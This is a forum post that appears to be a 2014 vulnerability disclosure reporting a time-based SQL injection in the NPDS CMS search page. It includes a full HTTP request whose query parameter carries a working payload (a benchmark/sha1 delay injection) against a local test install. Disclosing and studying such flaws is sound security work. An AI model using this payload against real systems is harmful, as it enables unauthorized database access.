Anonyme
 19853
|  Posté : 14-11-2014 19:10
Rporting a Time based sql injection
Reported By - Narendra Bhati
Email - bhati.contact@gmail.com
Security Analyst @ Suma Soft. Pvt. Ltd
======================================
TIme based sql injection http request = which is taking a time to response which make me confirm that there is a sql injection
===============================================
POST /npds/search.php HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; U; CPU iPhone OS 3_0 like Mac OS X; en-us) AppleWebKit/528.18 (KHTML, like Gecko) Version/4.0 Mobile/7A341 Safari/528.16
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://127.0.0.1/npds/index.php?op=edito
Cookie: admin=; pun_cookie_b03d0f=1%7C5c85108006f3ca4b272432a5be442deb43756d9c%7C1447517668%7C7 5fabcf00a72c6c06c40ec432c44c158a90fe85b; Elgg_install=0vsakk8pm4ksu1je3fp48krjv0; Elgg=8ojmn31jmhn2sntglokbokm0t1
Connection: keep-alive
!content-type:! application/x-www-form-urlencoded
Content-Length: 63
query=asdads%3Cxss%3E')and%20benchmark(20000000%2csha1(1))--%20
=================================================================== |
